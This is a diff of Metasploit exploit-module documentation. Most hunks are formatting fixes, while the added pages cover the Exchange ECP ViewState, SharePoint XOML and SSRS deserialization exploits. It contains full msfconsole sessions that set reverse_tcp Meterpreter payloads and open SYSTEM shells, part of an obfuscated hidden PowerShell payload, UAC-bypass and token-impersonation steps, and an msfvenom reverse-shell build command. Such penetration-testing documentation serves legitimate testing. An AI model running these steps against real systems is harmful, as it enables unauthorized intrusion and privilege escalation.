wuOM+pcQW7uMAbHYnDchPtTr2lp8bZvztocNtXnqvnvFGQuUrRV09IyKP+ohQyfNQocCRaE5VJeCkaRGed+PE8I1JOnwm7DGaYwpdFnow9XZQpQmLu83+9YAve7QgXhDnMDwdfvFkSw8Ccpf+1C1dHW1gDDhtO5QY4DjgIV1ZfdaUaCnKLuOAjn+fGJasikkMFTnHYnDcjBL92Zlfnpr6eye/M9glZdGCB/v38D6uvYPuz8FoFLfJ/zd6rcLvwTnr6c+cwgDURvuPYoPXfdlBEpmPPst4YWByvvlw/8rP+TsbAR/KyfHfwHyG93zwwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[*] Uploading serialized payload
+[+] Successfully uploaded serialized payload
+[*] Deserializing payload
+[+] Successfully deserialized payload
+[*] Sending stage (206403 bytes) to 172.16.249.139
+[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.139:50055) at 2020-03-12 16:51:07 -0500
+[!] This exploit may require manual cleanup of '..\webapps\DesktopCentral\_chart\logger.zip' on the target
+
+meterpreter >
+[+] Deleted ..\webapps\DesktopCentral\_chart\logger.zip
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : MSEDGEWIN10
+OS              : Windows 10 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
@@ -1,9 +1,9 @@
 ## Vulnerable Application

  Tested on Windows 7 x64 and x86.
-  
+
  Install the application from the link below and enable the web server by going to Options -> Server -> Enable Web Server on Port.
-  
+
  [Disk Pulse Enterprise v 9.9.16](https://www.exploit-db.com/apps/45ce22525c87c0762f6e467db6ddfcbc-diskpulseent_setup_v9.9.16.exe)

 ## Verification Steps
@@ -20,9 +20,9 @@
  **RHOST**

  IP address of the remote host running the server.
-  
+
  **RPORT**
-  
+
  Port that the web server is running on.  Default is 80 but it can be changed when setting up the program or in the options.

 ## Scenarios
@@ -52,4 +52,4 @@ Microsoft Windows [Version 6.1.7600]
 Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

 C:\Windows\system32>
-  ```
+  ```
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+This module exploits a .NET serialization vulnerability in the Exchange Control
+Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not
+randomizing the keys on a per-installation basis resulting in them using the
+same validationKey and decryptionKey values. With knowledge of these, values an
+attacker can craft a special viewstate to cause an OS command to be executed by
+NT_AUTHORITY\SYSTEM using .NET deserialization.
+
+The default ViewState validation key is: `cb2721abdaf8e9dc516d621d8b8bf13a2c9e8689a25303bf`.
+
+This module requires the user to authenticate to Exchange. At a minimum the user
+must be a member of the `Domain Users` group and have a mailbox configured on
+the Exchange server.
+
+The crafted ViewState must be submitted to the server in a GET request (POST
+requests will not work) which introduces a size restriction on the contents. Due
+to this, OS commands are limited to a length of approximately 450 which accounts
+for the overhead of the serialization data. The OS command must also be XML
+encoded which increases the size as well. The .NET deserialization used is the
+"TextFormattingRunProperties" chain from the [ysoserial.net][1] project.
+
+## Verification Steps
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: `use exploit/windows/http/exchange_ecp_viewstate`
+  1. Set the `RHOSTS`, `USERNAME` and `PASSWORD` options
+  4. Do: `run`
+  5. You should get a shell.
+
+## Options
+
+### USERNAME
+
+Username to log in with
+
+### Password
+
+Password to log in with
+
+## Scenarios
+
+### Exchange 2016 on Server 2012 x64
+
+  For example:
+
+    msf5 > use exploit/windows/http/exchange_ecp_viewstate
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129
+    RHOSTS => 192.168.159.129
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe
+    USERNAME => msflab.local\jdoe
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1
+    PASSWORD => Password1
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1
+    TARGET => 1
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+    PAYLOAD => windows/x64/meterpreter/reverse_tcp
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128
+    LHOST => 192.168.159.128
+    msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.159.128:4444 
+    [*] Command Stager progress -   3.61% done (449/12424 bytes)
+    [*] Command Stager progress -   7.23% done (898/12424 bytes)
+    [*] Command Stager progress -  10.84% done (1347/12424 bytes)
+    [*] Command Stager progress -  14.46% done (1796/12424 bytes)
+    [*] Command Stager progress -  18.07% done (2245/12424 bytes)
+    [*] Command Stager progress -  21.68% done (2694/12424 bytes)
+    [*] Command Stager progress -  25.30% done (3143/12424 bytes)
+    [*] Command Stager progress -  28.91% done (3592/12424 bytes)
+    [*] Command Stager progress -  32.53% done (4041/12424 bytes)
+    [*] Command Stager progress -  36.14% done (4490/12424 bytes)
+    [*] Command Stager progress -  39.75% done (4939/12424 bytes)
+    [*] Command Stager progress -  43.37% done (5388/12424 bytes)
+    [*] Command Stager progress -  46.98% done (5837/12424 bytes)
+    [*] Command Stager progress -  50.60% done (6286/12424 bytes)
+    [*] Command Stager progress -  54.21% done (6735/12424 bytes)
+    [*] Command Stager progress -  57.82% done (7184/12424 bytes)
+    [*] Command Stager progress -  61.44% done (7633/12424 bytes)
+    [*] Command Stager progress -  65.05% done (8082/12424 bytes)
+    [*] Command Stager progress -  68.67% done (8531/12424 bytes)
+    [*] Command Stager progress -  72.28% done (8980/12424 bytes)
+    [*] Command Stager progress -  75.89% done (9429/12424 bytes)
+    [*] Command Stager progress -  79.51% done (9878/12424 bytes)
+    [*] Command Stager progress -  82.74% done (10279/12424 bytes)
+    [*] Command Stager progress -  86.15% done (10703/12424 bytes)
+    [*] Command Stager progress -  89.43% done (11111/12424 bytes)
+    [*] Command Stager progress -  92.91% done (11543/12424 bytes)
+    [*] Command Stager progress -  96.28% done (11962/12424 bytes)
+    [*] Sending stage (206403 bytes) to 192.168.159.129
+    [*] Command Stager progress -  99.84% done (12404/12424 bytes)
+    [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.129:17626) at 2020-03-02 10:40:52 -0500
+    [*] Command Stager progress - 100.00% done (12424/12424 bytes)
+    
+    meterpreter > getuid
+    Server username: NT AUTHORITY\SYSTEM
+    meterpreter > sysinfo
+    Computer        : EXCHANGE
+    OS              : Windows 2012 R2 (6.3 Build 9600).
+    Architecture    : x64
+    System Language : en_US
+    Domain          : MSFLAB
+    Logged On Users : 9
+    Meterpreter     : x64/windows
+    meterpreter > 
+
+[1]: https://github.com/pwntester/ysoserial.net
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-  Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation. 
+  Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation.
  Since this application is started with system privileges this allows a system remote code execution.

 ## Verification Steps
@@ -1,10 +1,9 @@
-The module exploits a RCE bug on vulnerable installations of Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required.
-
-The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP ports `8080` and `8443` by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.
-
-
 ## Vulnerable Application

+  The module exploits a RCE bug on vulnerable installations of Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required.
+
+  The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP ports `8080` and `8443` by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.
+
  On a Windows machine, download and install a trial version of HPE IMC from here:

  [https://h10145.www1.hpe.com/downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19066&ProductNumber=JG748AAE&lang=&cc=&prodSeriesId=&SaidNumber=](https://h10145.www1.hpe.com/downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19066&ProductNumber=JG748AAE&lang=&cc=&prodSeriesId=&SaidNumber=)
@@ -21,7 +20,7 @@ The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP po
  2. Start msfconsole
  3. Do: ```use exploit/windows/http/hp_imc_java_deserialize```
  4. Do: ```set RHOSTS <RHOSTS>```
-  5. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp``` 
+  5. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp```
  6. Do: ```set LHOST <LHOST>```
  7. Do: ```check```
  8. **Verify** that you are seeing `The target is vulnerable.` in console.
@@ -67,4 +66,4 @@ All versions below 7.3 E0504P2 should be vulnerable remotely.
  Logged On Users : 1
  Meterpreter     : x86/windows
  meterpreter > 
-  ```
+  ```
@@ -1,18 +1,20 @@
-## Description
+## Vulnerable Application
+
+### Description

 This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM.
 This exploit was successfully tested on version 9, build 90109 and build 91084.

 **NOTE:** By default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file `rdslog0.txt`.
       
-## ManageEngine Desktop Central 9
+### ManageEngine Desktop Central 9

 Desktop Central is integrated desktop and mobile device management software that helps in managing servers, laptops, desktops, smartphones, and tablets from a central location. It is used for automating your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more. It supports managing both Windows, Mac and Linux operating systems.

-## Prerequisites
+### Prerequisites

 1. Start a Windows VM (such as Win 7)
-2. Install a vulnerable version of ManageEngine Desktop Central. This exploit was tested on Build [90109](http://archives.manageengine.com/desktop-central/90109/) and [91084](http://archives.manageengine.com/desktop-central/91084/). 
+2. Install a vulnerable version of ManageEngine Desktop Central. This exploit was tested on Build [90109](http://archives.manageengine.com/desktop-central/90109/) and [91084](http://archives.manageengine.com/desktop-central/91084/).
 3. After installation, verify that the server is working by visiting it with a browser. Depending on the version, the server port may be 8020, or 8040.

 ## Verification Steps
@@ -1,9 +1,9 @@
 ## Vulnerable Application

  [Install Octopus Deploy server](https://octopus.com/docs/getting-started#Gettingstarted-InstalltheOctopusserver)
-  
+
  [Create a test user/team](https://octopus.com/docs/administration/managing-users-and-teams) - Team should have "Project contributor" and "Project deployer", or just "System administrator" and add your test user.
-  
+
  [Create an API key](https://octopus.com/docs/how-to/how-to-create-an-api-key)

 ## Verification Steps
@@ -42,6 +42,7 @@
  **SSL**

  Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic.
+
 ## Scenarios

 ### Octopus Deploy Server 3.16.0
@@ -142,4 +143,4 @@ PS C:\Octopus\ADTest\Work\20170516025952-24> exit
 [*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

 msf exploit(octopusdeploy_deploy) > 
-  ```
+  ```
@@ -0,0 +1,78 @@
+## Vulnerable Application
+
+This module exploits a vulnerability within SharePoint and its .NET backend
+that allows an attacker to execute commands using specially crafted XOML data
+sent to SharePoint via the Workflows functionality.
+
+## Verification Steps
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: `use exploit/windows/http/sharepoint_workflows_xoml`
+  1. Set the target options (`RHOSTS`, `RPORT` and `SSL`) as appropriate
+  1. Set the authentication options (`DOMAIN`, `USERNAME` and `PASSWORD`) as appropriate
+  1. Do: `run`
+  1. You should get a shell
+
+## Scenarios
+
+### SharePoint 2019 on Server 2016
+
+```
+msf5 exploit(windows/http/sharepoint_workflows_xoml) > show options 
+
+Module options (exploit/windows/http/sharepoint_workflows_xoml):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   DOMAIN     WORKGROUP        yes       The domain to use for Windows authentication
+   PASSWORD   Password1        yes       The password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.14   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to the SharePoint application
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   administrator    yes       Username to authenticate as
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/bind_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LPORT     4444             yes       The listen port
+   RHOST     192.168.159.14   no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Windows Powershell
+
+
+msf5 exploit(windows/http/sharepoint_workflows_xoml) > exploit
+
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
+[*] Started bind TCP handler against 192.168.159.14:4444
+[*] Sending stage (206403 bytes) to 192.168.159.14
+[*] Meterpreter session 3 opened (0.0.0.0:0 -> 192.168.159.14:4444) at 2020-03-23 18:11:44 -0400
+
+meterpreter > sysinfo
+Computer        : SHRPNT2019-P
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : SHRPNT2019P
+Logged On Users : 14
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: SHRPNT2019P\Administrator
+meterpreter >
+```
@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits a .NET serialization vulnerability in the SQL Server
+Reporting Services web application. The vulnerability exists within the a class
+that will load serialized data submitted in a POST request. When processed this
+data can lead to code execution within the context of the application which by
+default is a service account.
+
+An account is necessary in order to leverage this vulnerability. The request is
+submitted using NTLM basic authentication. This account must be assigned at
+least the "Browser" role on the site. This is the lowest privilege available and
+simply allows the user to view folders, reports and subscribe to reports. To
+authenticate as a domain user, set the `DOMAIN` option.
+
+### Service Installation And Setup
+
+Setting up a vulnerable environment for testing is best done by using a SQL
+Server 2016 installation ISO which includes an offline installer for SSRS. Later
+versions of SQL Server installation ISOs link to an online installer which will
+install the patched version automatically.
+
+When installing SQL Server 2016:
+
+  1. Select "New SQL Server stand-alone installation or add features to an
+    existing installation"
+  1. Later in the "Feature Selection" section, select "Reporting Services -
+    Native" under the "Instance Features" group
+  1. Proceed with the remainder of the installation per usual
+
+After the server has been installed, it must be configured using the "Reporting
+Services Configuration Manager" application. Ensure a database is selected and
+created, that both the Web Services URL and Web Portal URLs are activated.
+Finally, from the web interface, add accounts and privileges as desired.
+Individual accounts can have privileges added by selecting "Manage Folder" and
+adding them from this dashboard. **Do not use privileges dashboard available
+from "Site Settings" to add the necessary privileges.**
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/http/ssrs_navcorrector_viewstate`
+  4. Set the `RHOSTS`, `USERNAME` and `PASSWORD` options
+  5. Do: `run`
+  6. You should get a shell.
+
+## Scenarios
+
+### SSRS 2016 on Server 2012 x64
+
+    msf5 > use exploit/windows/http/ssrs_navcorrector_viewstate 
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set RHOSTS 192.168.159.141
+    RHOSTS => 192.168.159.141
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set USERNAME jdoe
+    USERNAME => jdoe
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set DOMAIN msflab.local
+    DOMAIN => msflab.local
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set PASSWORD Password1
+    PASSWORD => Password1
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+    PAYLOAD => windows/x64/meterpreter/reverse_tcp
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set LHOST 192.168.159.128 
+    LHOST => 192.168.159.128
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > check
+    [*] 192.168.159.141:80 - The service is running, but could not be validated.
+    msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.159.128:4444 
+    [*] Command Stager progress -  24.99% done (2999/12002 bytes)
+    [*] Command Stager progress -  49.98% done (5998/12002 bytes)
+    [*] Command Stager progress -  74.96% done (8997/12002 bytes)
+    [*] Sending stage (206403 bytes) to 192.168.159.141
+    [*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.141:50376) at 2020-03-06 16:19:24 -0500
+    [*] Command Stager progress -  99.83% done (11982/12002 bytes)
+    [*] Command Stager progress - 100.00% done (12002/12002 bytes)
+    
+    meterpreter > getuid
+    Server username: NT Service\ReportServer
+    meterpreter > sysinfo
+    Computer        : SERVER2012
+    OS              : Windows 2012 R2 (6.3 Build 9600).
+    Architecture    : x64
+    System Language : en_US
+    Domain          : MSFLAB
+    Logged On Users : 10
+    Meterpreter     : x64/windows
+    meterpreter >
@@ -1,13 +1,13 @@
-## Description
-This module exploits the lack of proper authentication checks in IBM Websphere Application Server ND that allows for the execution of an arbitrary command and upload of an arbitrary file as SYSTEM. The module serializes the required Java objects expected by the IBM Websphere server.
-
-The vulnerability was identified by @rwincey (b0yd) of [Securifera](https://www.securifera.com/) and was assigned [CVE-2019-4279](https://www-01.ibm.com/support/docview.wss?uid=ibm10883628).
-
-
 ## Vulnerable Application
-The module affects [IBM Websphere Application Server Network Deployment](https://www.ibm.com/support/knowledgecenter/en/SSAW57/mapfiles/product_welcome_wasnd.html). The agent is installed on servers with the network deployment feature and listens on TCP port 11002,11004, or 11006. The vulnerability affects versions up to 9.0.0.11.
+
+This module exploits the lack of proper authentication checks in IBM Websphere Application Server ND that allows for the execution of an
+arbitrary command and upload of an arbitrary file as SYSTEM. The module serializes the required Java objects expected by the IBM Websphere server.
+
+The module affects [IBM Websphere Application Server Network Deployment](https://www.ibm.com/support/knowledgecenter/en/SSAW57/mapfiles/product_welcome_wasnd.html).
+The agent is installed on servers with the network deployment feature and listens on TCP port 11002,11004, or 11006. The vulnerability affects versions up to 9.0.0.11.

 ## Verification Steps
+
 To use this exploit you will need access to IBM Websphere Application Server Network Deployment.

 1. Install the IBM Websphere Application Server Network Deployment on a host.
@@ -21,10 +21,12 @@ To use this exploit you will need access to IBM Websphere Application Server Net
 The result should be that calc.exe is executed on the target machine.

 ## Scenarios
+
 The exploit module contains several targets as detailed below.

 ### Target 0: Windows Powershell Injected Shellcode
-This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). 
+
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell).

 ```
 msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce
@@ -1,6 +1,6 @@
-## Description
+## Vulnerable Application

-This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request. 
+This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request.

 **IMPORTANT:** The target IIS machine must meet these conditions to be considered as exploitable:

@@ -8,7 +8,7 @@ This module can be used to execute a payload on IIS servers that have world-writ
 2. It allows Read and Write permission.
 3. It supports ASP.

-## WebDAV
+### WebDAV

 Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol (HTTP) that allows clients to perform remote Web content authoring operations. WebDAV is defined in RFC 4918 by a working group of the Internet Engineering Task Force.

@@ -16,10 +16,10 @@ Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hyperte

 1. Do: ```use exploit/windows/iis/iis_webdav_upload_asp```
 2. Do: ```set payload windows/meterpreter/reverse_tcp```
-2. Do: ```set LHOST [IP]```
-3. Do: ```set RHOST [IP]```
-3. Do: ```set PATH / [PATH]```
-4. Do: ```run```
+3. Do: ```set LHOST [IP]```
+4. Do: ```set RHOST [IP]```
+5. Do: ```set PATH / [PATH]```
+6. Do: ```run```

 ## Scenarios

@@ -1,4 +1,6 @@
-## Introduction
+## Vulnerable Application
+
+### Introduction

  This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
  the current user hive, and inserting a custom command that will get invoked when
@@ -14,12 +16,11 @@

 ## Usage

-  You'll first need to obtain a session on the target system.  
+  You'll first need to obtain a session on the target system.
  Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options.
  The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system.
  On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (`set DISABLEPAYLOADHANDLER true`)
  and manually create a job handler corresponding to the payload.
-  

 ## Scenarios

@@ -1,10 +1,10 @@
 ## Introduction

-This module will bypass UAC on any Windows installation with Powershell installed. 
+This module will bypass UAC on any Windows installation with Powershell installed.

 There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
 When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
-%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must 
+%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must
 be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog.

 ## Usage
@@ -9,13 +9,13 @@

  The module modifies the registry in order for this exploit to work. The modification is
  reverted once the exploitation attempt has finished.
-	
+
  The module does not require the architecture of the payload to match the OS. If
  specifying EXE::Custom your DLL should call ExitProcess() after starting the
  payload in a different process.

 ## Usage
-	
+
  1. First we need to obtain a session on the target system.
  2. Load module: `use exploit/windows/local/bypassuac_sluihijack`
  3. Set the `payload`: `set payload windows/x64/meterpreter/reverse_tcp`
@@ -5,7 +5,7 @@ is run with the "autoElevate" property set to true, and it will automatically
 launch a file from a low-privilege registry location with elevated privileges.
 To bypass, simply place the binary on disk, write its location in the
 correct registry key, and run WSReset.exe.  The binary will be run with elevated
-privileges. 
+privileges.

 ## Usage

@@ -1,34 +1,38 @@
 ## Introduction
-  This module will abuse the SeImperonsate privilege commonly found in 
-services due to the requirement to impersonate a client upon 
-authentication. As such it is possible to impersonate the SYSTEM account 
-and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM 
-attack at which intercepts the hash and relay responses from RPC to be 
-able to establish a handle to a new SYSTEM token. Some caveats : Set 
-your target option to match the architecture of your Meterpreter 
-session, else it will inject the wrong architecture DLL into the process 
-of a seperate architecture. Additionally, after you have established a 
+
+  This module will abuse the SeImperonsate privilege commonly found in
+services due to the requirement to impersonate a client upon
+authentication. As such it is possible to impersonate the SYSTEM account
+and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
+attack at which intercepts the hash and relay responses from RPC to be
+able to establish a handle to a new SYSTEM token. Some caveats : Set
+your target option to match the architecture of your Meterpreter
+session, else it will inject the wrong architecture DLL into the process
+of a seperate architecture. Additionally, after you have established a
 session, you must use incognito to imperonsate the SYSTEM Token.

 ## Build Instructions
+
 This builds using visual studio 2017 and tools v141.  Attempts
 to compile with previous verstions of build tools will succeed but
 the resulting binary fails to exploit the vulnerability.

 ## Usage
+
  You'll first need to obtain a session on the target system.
-  Next, once the module is loaded, one simply needs to set the 
+  Next, once the module is loaded, one simply needs to set the
 ```payload``` and ```session``` options, in addition to architecture.
-  
-  Your user at which you are trying to exploit must have `SeImpersonate` 
+
+  Your user at which you are trying to exploit must have `SeImpersonate`
 privileges.
-  
-  The module has a hardcoded timeout of 20 seconds, as the attack may 
-not work immediately and take a few seconds to start. Also, check to 
-make sure port 6666 is inherently not in use else the exploit will not 
-run properly
-  
+
+  The module has a hardcoded timeout of 20 seconds, as the attack may
+not work immediately and take a few seconds to start. Also, check to
+make sure port 6666 is inherently not in use else the exploit will not
+run properly.
+
 ## Scenarios
+
 ```
  Name Current Setting Required Description
   ---- --------------- -------- -----------
@@ -11,6 +11,15 @@ For more info see:
 - [Rotten Potato](https://github.com/foxglovesec/RottenPotato)
 - [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/)
 - [Juicy Potato](https://ohpe.it/juicy-potato/)
+- [No More Juicy Potato](https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/)
+
+## Vulnerable Applications
+
+Microsoft Windows Server 2008 R2, Server 2012, Server 2012 R2, and Server 2016 are known to be affected. Server 2019 was not affected by this issue.
+
+This issue was patched in Microsoft Windows 10 v1809 (build 17763). v1803 is the last vulnerable version. See [No More Juicy Potato](https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/) for technical details.
+
+At the time of disclosure, disabling DCOM was provided as a workaround to mitigate this vulnerability. As such, servers with DCOM disabled will not be vulnerable to this attack.

 ## Usage

@@ -1,27 +1,30 @@
 ## Introduction
-  This module will abuse the SeImperonsate privilege commonly found in 
-services due to the requirement to impersonate a client upon 
-authentication. As such it is possible to impersonate the SYSTEM account 
-and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM 
-attack at which intercepts the hash and relay responses from RPC to be 
-able to establish a handle to a new SYSTEM token. Some caveats : Set 
-your target option to match the architecture of your Meterpreter 
-session, else it will inject the wrong architecture DLL into the process 
-of a seperate architecture. Additionally, after you have established a 
+
+  This module will abuse the SeImperonsate privilege commonly found in
+services due to the requirement to impersonate a client upon
+authentication. As such it is possible to impersonate the SYSTEM account
+and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
+attack at which intercepts the hash and relay responses from RPC to be
+able to establish a handle to a new SYSTEM token. Some caveats : Set
+your target option to match the architecture of your Meterpreter
+session, else it will inject the wrong architecture DLL into the process
+of a seperate architecture. Additionally, after you have established a
 session, you must use incognito to imperonsate the SYSTEM Token.
+
 ## Usage
+
  You'll first need to obtain a session on the target system.
-  Next, once the module is loaded, one simply needs to set the 
+  Next, once the module is loaded, one simply needs to set the
 ```payload``` and ```session``` options, in addition to architecture.
-  
-  Your user at which you are trying to exploit must have `SeImpersonate` 
+
+  Your user at which you are trying to exploit must have `SeImpersonate`
 privileges.
-  
-  The module has a hardcoded timeout of 20 seconds, as the attack may 
-not work immediately and take a few seconds to start. Also, check to 
-make sure port 6666 is inherently not in use else the exploit will not 
+
+  The module has a hardcoded timeout of 20 seconds, as the attack may
+not work immediately and take a few seconds to start. Also, check to
+make sure port 6666 is inherently not in use else the exploit will not
 run properly
-  
+
 ## Scenarios
 ```
  Name Current Setting Required Description
@@ -1,8 +1,10 @@
 ## Vulnerable Application

-  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
+  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/)
+  or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).

-  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
+  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught,
+  so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.

  The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.

@@ -11,8 +13,6 @@

 ## Verification Steps

-  Example steps in this format:
-
  1. Install the application
  2. Wait for `C:\ProgramData\Panda Security\Panda Devices Agent\Downloads` folder to appear
  3. Start msfconsole
@@ -28,7 +28,7 @@
  **DLL**

  Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used.  However the dll seems to be VERY picky.  Default is cryptnet.dll.  See the chart for more details.
-  
+
 |                                           | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
 |---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
 | 64bit target (1), win10 x64 | CRASH | CRASH | NO |  NO       | valid     |    no |
@@ -38,9 +38,9 @@
 | 32bit target (0), win7sp1 x86 |  |  | valid |       | valid (caught by av)     |     |

 In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.
-  
+
  **ListenerTimeout**
-  
+
  How long to wait for a shell.  PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things)

 ## Scenarios
@@ -48,7 +48,7 @@ In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSE
 ### Windows 8.1 x86 with Panda Antirivus Pro 2016 16.1.2

  Step 1, get a local shell.  I used msfvenom to drop an exe for easy user level meterpreter.
-  
+
    msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
    
    msf > use exploit/multi/handler 
